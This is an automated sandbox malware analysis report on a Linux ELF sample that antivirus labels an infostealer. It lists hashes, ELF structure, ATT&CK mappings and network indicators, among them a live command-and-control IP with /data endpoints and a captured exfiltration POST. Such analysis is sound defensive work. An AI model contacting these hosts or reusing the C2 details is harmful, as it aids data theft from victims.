Edit tour

Linux Analysis Report
2gkeFl1jcj.elf

Overview

General Information

Sample name:2gkeFl1jcj.elf
renamed because original name is a hash value
Original sample name:ae520a6e499ad39e64858200e21f7c54e590fca00aa5de5f5e32f016075e549f.elf
Analysis ID:1641363
MD5:333079089b8587563de0ff1e8f5a18b0
SHA1:09d5642dc974aa1590e6cad5f0689ed721a69975
SHA256:ae520a6e499ad39e64858200e21f7c54e590fca00aa5de5f5e32f016075e549f
Tags:elfForceMajeureClauseuser-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Executes the "rm" command used to delete files or directories
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1641363
Start date and time:2025-03-18 09:05:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 0s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:2gkeFl1jcj.elf
renamed because original name is a hash value
Original Sample Name:ae520a6e499ad39e64858200e21f7c54e590fca00aa5de5f5e32f016075e549f.elf
Detection:MAL
Classification:mal48.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • VT rate limit hit for: http://134.209.250.88/data
  • VT rate limit hit for: http://134.209.250.88/data256
  • VT rate limit hit for: http://134.209.250.88/datald
  • VT rate limit hit for: http://134.209.250.88/datarequired
Command:/tmp/2gkeFl1jcj.elf
PID:5425
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5410, Parent: 3581)
  • rm (PID: 5410, Parent: 3581, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.SqAm2DyCXO /tmp/tmp.TTarPVIarB /tmp/tmp.qnq7hGh9Cv
  • dash New Fork (PID: 5411, Parent: 3581)
  • rm (PID: 5411, Parent: 3581, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.SqAm2DyCXO /tmp/tmp.TTarPVIarB /tmp/tmp.qnq7hGh9Cv
  • 2gkeFl1jcj.elf (PID: 5425, Parent: 5348, MD5: 333079089b8587563de0ff1e8f5a18b0) Arguments: /tmp/2gkeFl1jcj.elf
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2gkeFl1jcj.elfVirustotal: Detection: 24%Perma Link
Source: 2gkeFl1jcj.elfReversingLabs: Detection: 33%
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 134.209.250.88
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: unknownHTTP traffic detected: POST /data HTTP/1.1Host: 134.209.250.88User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoContent-Length: 1608Accept-Encoding: gzipConnection: closeData Raw: 4e 57 52 6a 4e 54 41 7a 59 32 59 74 4e 6a 59 33 4d 53 30 30 4e 54 4d 79 4c 57 45 77 4d 6a 45 74 59 6a 64 6c 4f 44 4a 6c 5a 44 45 7a 59 54 41 33 66 45 6c 53 53 42 52 4c 2b 70 45 4a 50 66 38 6f 65 2f 78 39 75 41 43 6a 41 34 65 4b 7a 36 53 32 43 45 6e 66 55 45 7a 45 4d 4c 33 6c 64 36 32 48 4b 6c 33 65 78 4e 71 49 48 37 6f 46 4d 33 64 79 42 4a 37 61 57 6e 63 69 30 76 64 44 53 51 6c 58 4b 34 46 35 71 4f 6a 55 61 49 6f 77 52 41 50 75 35 38 59 62 4a 65 73 62 74 4e 65 4b 68 37 51 33 6b 37 39 6c 58 4a 39 45 6d 79 62 6e 73 67 44 55 6e 6d 47 49 68 72 4b 70 6f 59 65 41 68 61 6c 68 72 64 4a 2f 41 41 34 47 62 37 71 64 4d 6e 34 47 72 6e 76 70 45 32 4b 42 6e 72 6d 70 65 65 35 34 71 46 4a 36 77 6e 34 57 47 79 58 72 53 74 4c 6b 61 6f 39 6c 46 37 2f 58 2f 6c 6c 66 49 41 46 63 38 70 38 66 5a 46 5a 59 41 2b 66 7a 32 76 48 68 69 6f 74 73 6c 49 55 30 30 68 53 42 4d 2f 31 79 42 6a 39 59 4c 68 32 34 65 6a 43 73 33 63 77 39 59 67 6a 56 6a 77 50 41 73 5a 6c 6e 41 63 37 79 56 45 45 7a 31 52 4c 65 36 75 50 76 4c 48 65 74 47 54 54 6d 41 79 6e 31 70 4c 34 79 66 2b 63 49 43 2f 5a 38 35 30 6c 6a 56 6e 42 7a 55 68 76 45 36 7a 50 73 53 6f 58 4d 2f 46 71 4b 38 54 4b 42 4f 46 32 6a 62 71 78 58 30 71 32 6a 61 58 38 6f 72 2f 6d 4b 79 68 77 41 50 4b 72 45 79 32 65 39 62 4c 34 44 75 48 48 79 73 70 2f 72 68 69 71 67 6a 5a 48 2f 75 73 36 70 42 2f 74 68 36 51 41 48 6a 54 54 78 39 67 76 46 48 74 7a 4d 32 53 41 4f 6e 6d 39 4d 36 6f 38 2b 45 38 33 62 74 72 49 6b 76 5a 2b 31 50 79 78 72 59 65 50 68 45 67 71 48 6f 33 78 2f 4f 2b 36 56 34 63 37 46 71 61 37 5a 74 6b 51 69 65 65 2b 55 71 63 74 45 30 71 66 7a 68 67 73 69 42 37 62 78 64 6a 71 78 77 72 64 56 57 55 70 2b 73 49 61 57 64 79 4e 53 55 4c 30 4e 33 46 2b 6f 70 65 67 74 48 51 73 37 37 30 6a 2f 41 6c 36 4f 46 2b 59 74 51 34 55 7a 31 43 43 71 30 47 42 64 63 48 54 51 69 74 35 4c 70 72 6f 79 32 36 6e 53 69 6f 53 69 71 44 38 71 74 50 61 76 47 48 36 38 75 6a 53 62 44 41 75 78 56 43 58 57 78 38 54 6c 64 79 76 45 4b 48 44 64 62 4b 55 30 58 32 50 4e 49 44 71 55 61 6b 4f 6b 59 53 69 42 52 48 61 38 5a 55 6c 45 4a 6d 32 56 7a 54 47 64 38 44 4d 66 42 62 74 61 77 30 30 4b 42 6a 62 57 36 67 48 55 44 30 4e 6e 75 75 47 7a 50 58 45 37 72 2f 34 36 41 35 61 74 74 41 79 32 79 71 4b 4b 79 30 4b 68 70 31 54 39 4b 45 33 2f 36 76 74 55 57 51 39 61 79 38 49 6c 78 74 61 32 65 2b 41 59 62 53 6c 52 50 5a 67 74 4c 67 66 79 79 48 4c 39 73 69 69 44 36 73 39 75 59 6b 4b 58 49 38 56 57 75 47 71 58 6c 51 58 44 68 45 46 49 44 47 72 61 4c 52 56 41 66 6f 66 46 35 50 4b 42 4f 56 64 41 75 78 31 73 42 67 53 36 75 4b 32 50 43 73 75 39 6d 68 41 41 73 75 49 6f 75 30 39 53 6a 38 62 77 73 54 6d 6f 59 72 37 66 78 2b 30 4e 4b 6c 50 49 41 44 4e 53 6f 63 43 79 4a 64 38 72 54 6c 30 47 35 70 64 54 2f 45 70 62 73 37 6a 49 64 35 62 33 74 36 61 58 58 73 51 6d 61 48 48 71 78 6e 7a 62 65 4b 39 46 7a 6c 46 51
Source: 2gkeFl1jcj.elfELF static info symbol of initial sample: freeaddrinfo
Source: 2gkeFl1jcj.elfELF static info symbol of initial sample: gai_strerror
Source: 2gkeFl1jcj.elfELF static info symbol of initial sample: getaddrinfo
Source: 2gkeFl1jcj.elfELF static info symbol of initial sample: getnameinfo
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/134.209.250.88:80CheckIf-Modified-SinceCheckCALLBACK_INTERVALENCRYPTED_EXCHANG
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/application/octet-streamTransfer-Encoding05.000Zecdsa-sha2-nistp256ecdsa-sha2-
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/data
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/data256
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/data256diffie-hellman-group14-sha256diffie-hellman-group16-sha512
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/data813919no
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/dataindows
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/datald
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/datald3
Source: 2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://134.209.250.88/datarequired
Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@2/0
Source: ELF file sectionSubmission: 2gkeFl1jcj.elf
Source: /usr/bin/dash (PID: 5410)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.SqAm2DyCXO /tmp/tmp.TTarPVIarB /tmp/tmp.qnq7hGh9CvJump to behavior
Source: /usr/bin/dash (PID: 5411)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.SqAm2DyCXO /tmp/tmp.TTarPVIarB /tmp/tmp.qnq7hGh9CvJump to behavior
Source: ELF symbol in initial sampleSymbol name: nanosleep
Source: /tmp/2gkeFl1jcj.elf (PID: 5425)Queries kernel information via 'uname': Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File Deletion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1641363 Sample: 2gkeFl1jcj.elf Startdate: 18/03/2025 Architecture: LINUX Score: 48 10 134.209.250.88, 57564, 57566, 57568 DIGITALOCEAN-ASNUS United States 2->10 12 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->12 14 daisy.ubuntu.com 2->14 16 Multi AV Scanner detection for submitted file 2->16 6 dash rm 2gkeFl1jcj.elf 2->6         started        8 dash rm 2->8         started        signatures3 process4
SourceDetectionScannerLabelLink
2gkeFl1jcj.elf25%VirustotalBrowse
2gkeFl1jcj.elf33%ReversingLabsLinux.Infostealer.PoSeidon
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://134.209.250.88/datafalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://134.209.250.88/data2562gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
        unknown
        http://134.209.250.88/datald2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
          unknown
          http://134.209.250.88/datarequired2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
            unknown
            http://134.209.250.88/data813919no2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              unknown
              http://134.209.250.88/2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                unknown
                http://134.209.250.88/application/octet-streamTransfer-Encoding05.000Zecdsa-sha2-nistp256ecdsa-sha2-2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                  unknown
                  http://134.209.250.88/datald32gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                    unknown
                    http://134.209.250.88/dataindows2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                      unknown
                      http://134.209.250.88/134.209.250.88:80CheckIf-Modified-SinceCheckCALLBACK_INTERVALENCRYPTED_EXCHANG2gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                        unknown
                        http://134.209.250.88/data256diffie-hellman-group14-sha256diffie-hellman-group16-sha5122gkeFl1jcj.elf, 5425.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          185.125.190.26
                          unknownUnited Kingdom
                          41231CANONICAL-ASGBfalse
                          134.209.250.88
                          unknownUnited States
                          14061DIGITALOCEAN-ASNUSfalse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.125.190.26x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    sync.sparc.elfGet hashmaliciousUnknownBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              daisy.ubuntu.comsshd.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.25
                                              sshd.elfGet hashmaliciousUnknownBrowse
                                              • 162.213.35.24
                                              i-5.8-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.25
                                              a-r.m-4.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.25
                                              a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.24
                                              m-i.p-s.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.24
                                              m-p.s-l.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.25
                                              x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.25
                                              a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 162.213.35.24
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              DIGITALOCEAN-ASNUShttp://unjited.comGet hashmaliciousUnknownBrowse
                                              • 104.248.224.96
                                              73ybGtnYXx.exeGet hashmaliciousWhiteSnake StealerBrowse
                                              • 167.99.138.249
                                              https://app.eraser.io/workspace/32c12MLUJSCjts5wfE3E?origin=shareGet hashmaliciousHTMLPhisherBrowse
                                              • 138.197.132.229
                                              Spoofer.exeGet hashmaliciousLodaRATBrowse
                                              • 206.189.80.59
                                              S6d0gHq1r3.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 95.85.2.23
                                              hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                              • 104.248.130.66
                                              hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                              • 134.122.7.16
                                              https://sheingivesback.comGet hashmaliciousUnknownBrowse
                                              • 64.225.91.73
                                              http://onllyfans.me/Get hashmaliciousUnknownBrowse
                                              • 128.199.106.47
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 5.101.107.92
                                              CANONICAL-ASGBGwRba1mTFR.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              na.elfGet hashmaliciousPrometeiBrowse
                                              • 91.189.91.42
                                              No context
                                              No context
                                              No created / dropped files found
                                              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=80a28c2d4ee1e6f4aa07b2e11a5b19f0e440de9f, for GNU/Linux 3.2.0, stripped
                                              Entropy (8bit):6.113925118663311
                                              TrID:
                                              • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                                              • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                                              • Lumena CEL bitmap (63/63) 0.78%
                                              File name:2gkeFl1jcj.elf
                                              File size:14'045'800 bytes
                                              MD5:333079089b8587563de0ff1e8f5a18b0
                                              SHA1:09d5642dc974aa1590e6cad5f0689ed721a69975
                                              SHA256:ae520a6e499ad39e64858200e21f7c54e590fca00aa5de5f5e32f016075e549f
                                              SHA512:ee183d2fbf611d256c5a6f04db7f823dc1041c05b9823aa1c8dd85543539284f3d2131520f07f526689f3bfee3faed4b982e67679afe4817e4daf57ccd62f9a6
                                              SSDEEP:98304:rJRoVFGJbf92ouJbOmxf82M4xOigymtGvEemaEk0+Gy:UrFOma2M4xOigymMvElH
                                              TLSH:F4E62943E8E61C94D8FDC2B596398226E971784D0B3933DB67A1B6301F337E19A76B40
                                              File Content Preview:.ELF..............>......#@.....@........I..........@.8...@.".!.........@.......@.@.....@.@...............................................@.......@...............................................@.......@...................................... ....... @....

                                              ELF header

                                              Class:ELF64
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:Advanced Micro Devices X86-64
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x4023f0
                                              Flags:0x0
                                              ELF Header Size:64
                                              Program Header Offset:64
                                              Program Header Size:56
                                              Number of Program Headers:12
                                              Section Header Offset:14043624
                                              Section Header Size:64
                                              Number of Section Headers:34
                                              Header String Table Index:33
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .interpPROGBITS0x4002e00x2e00x1c0x00x2A001
                                              .note.gnu.build-idNOTE0x4002fc0x2fc0x240x00x2A004
                                              .note.ABI-tagNOTE0x4003200x3200x200x00x2A004
                                              .gnu.hashGNU_HASH0x4003400x3400x340x00x2A508
                                              .dynsymDYNSYM0x4003780x3780x6300x180x2A618
                                              .dynstrSTRTAB0x4009a80x9a80x3300x00x2A001
                                              .gnu.versionVERSYM0x400cd80xcd80x840x20x2A502
                                              .gnu.version_rVERNEED0x400d600xd600x700x00x2A638
                                              .rela.dynRELA0x400dd00xdd00x480x180x2A508
                                              .rela.pltRELA0x400e180xe180x5700x180x42AI5268
                                              .initPROGBITS0x4020000x20000x170x00x6AX004
                                              .pltPROGBITS0x4020200x20200x3b00x100x6AX0016
                                              .textPROGBITS0x4023e00x23e00x8a8ed10x00x6AX0032
                                              .finiPROGBITS0xcab2b40x8ab2b40x90x00x6AX004
                                              .rodataPROGBITS0xcac0000x8ac0000x20e3600x00x2A0032
                                              .typelinkPROGBITS0xeba3600xaba3600x36040x00x2A0032
                                              .itablinkPROGBITS0xebd9800xabd9800xee80x00x2A0032
                                              .gopclntabPROGBITS0xebe8800xabe8800x253fe80x00x2A0032
                                              .eh_frame_hdrPROGBITS0x11128680xd128680x1c40x00x2A004
                                              .eh_framePROGBITS0x1112a300xd12a300x8d80x00x2A008
                                              .tbssNOBITS0x1114de80xd13de80x80x00x403WAT008
                                              .init_arrayINIT_ARRAY0x1114de80xd13de80x80x80x3WA008
                                              .fini_arrayFINI_ARRAY0x1114df00xd13df00x80x80x3WA008
                                              .dynamicDYNAMIC0x1114df80xd13df80x1f00x100x3WA608
                                              .gotPROGBITS0x1114fe80xd13fe80x180x80x3WA008
                                              .got.pltPROGBITS0x11150000xd140000x1e80x80x3WA008
                                              .dataPROGBITS0x11152000xd142000x212c00x00x3WA0032
                                              .go.buildinfoPROGBITS0x11364c00xd354c00x300x00x3WA0016
                                              .noptrdataPROGBITS0x11365000xd355000x2f3800x00x3WA0032
                                              .bssNOBITS0x11658800xd648800x252800x00x3WA0032
                                              .noptrbssNOBITS0x118ab000xd648800x132900x00x3WA0032
                                              .commentPROGBITS0x00xd648800x270x10x30MS001
                                              .shstrtabSTRTAB0x00xd648a70x13b0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              PHDR0x400x4000400x4000400x2a00x2a02.15060x4R 0x8
                                              INTERP0x2e00x4002e00x4002e00x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                                              LOAD0x00x4000000x4000000x13880x13882.97640x4R 0x1000.interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
                                              LOAD0x20000x4020000x4020000x8a92bd0x8a92bd6.24450x5R E0x1000.init .plt .text .fini
                                              LOAD0x8ac0000xcac0000xcac0000x4673080x4673085.26060x4R 0x1000.rodata .typelink .itablink .gopclntab .eh_frame_hdr .eh_frame
                                              LOAD0xd13de80x1114de80x1114de80x50a980x88fa84.32770x6RW 0x1000.tbss .init_array .fini_array .dynamic .got .got.plt .data .go.buildinfo .noptrdata .bss .noptrbss
                                              DYNAMIC0xd13df80x1114df80x1114df80x1f00x1f01.62220x6RW 0x8.dynamic
                                              NOTE0x2fc0x4002fc0x4002fc0x440x443.32670x4R 0x4.note.gnu.build-id .note.ABI-tag
                                              TLS0xd13de80x1114de80x1114de80x00x80.00000x4R 0x8.tbss
                                              GNU_EH_FRAME0xd128680x11128680x11128680x1c40x1c44.65760x4R 0x4.eh_frame_hdr
                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                              GNU_RELRO0xd13de80x1114de80x1114de80x2180x2181.61130x4R 0x1.tbss .init_array .fini_array .dynamic .got
                                              TypeMetaValueTag
                                              DT_NEEDEDsharedliblibpthread.so.00x1
                                              DT_NEEDEDsharedliblibresolv.so.20x1
                                              DT_NEEDEDsharedliblibc.so.60x1
                                              DT_INITvalue0x4020000xc
                                              DT_FINIvalue0xcab2b40xd
                                              DT_INIT_ARRAYvalue0x1114de80x19
                                              DT_INIT_ARRAYSZbytes80x1b
                                              DT_FINI_ARRAYvalue0x1114df00x1a
                                              DT_FINI_ARRAYSZbytes80x1c
                                              DT_GNU_HASHvalue0x4003400x6ffffef5
                                              DT_STRTABvalue0x4009a80x5
                                              DT_SYMTABvalue0x4003780x6
                                              DT_STRSZbytes8160xa
                                              DT_SYMENTbytes240xb
                                              DT_DEBUGvalue0x00x15
                                              DT_PLTGOTvalue0x11150000x3
                                              DT_PLTRELSZbytes13920x2
                                              DT_PLTRELpltrelDT_RELA0x14
                                              DT_JMPRELvalue0x400e180x17
                                              DT_RELAvalue0x400dd00x7
                                              DT_RELASZbytes720x8
                                              DT_RELAENTbytes240x9
                                              DT_VERNEEDvalue0x400d600x6ffffffe
                                              DT_VERNEEDNUMvalue30x6fffffff
                                              DT_VERSYMvalue0x400cd80x6ffffff0
                                              DT_NULLvalue0x00x0
                                              NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                              .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                              RunMain.dynsym0xcaa23060FUNC<unknown>DEFAULT13
                                              __errno_locationGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                              __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              __res_searchGLIBC_2.2.5libresolv.so.2.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              _cgo_panic.dynsym0x4b848045FUNC<unknown>DEFAULT13
                                              _cgo_topofstack.dynsym0x469e2025FUNC<unknown>DEFAULT13
                                              abortGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              crosscall2.dynsym0x4b8500104FUNC<unknown>DEFAULT13
                                              fprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              fputcGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              freeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              freeaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              fwriteGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              gai_strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              geteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getgrgid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
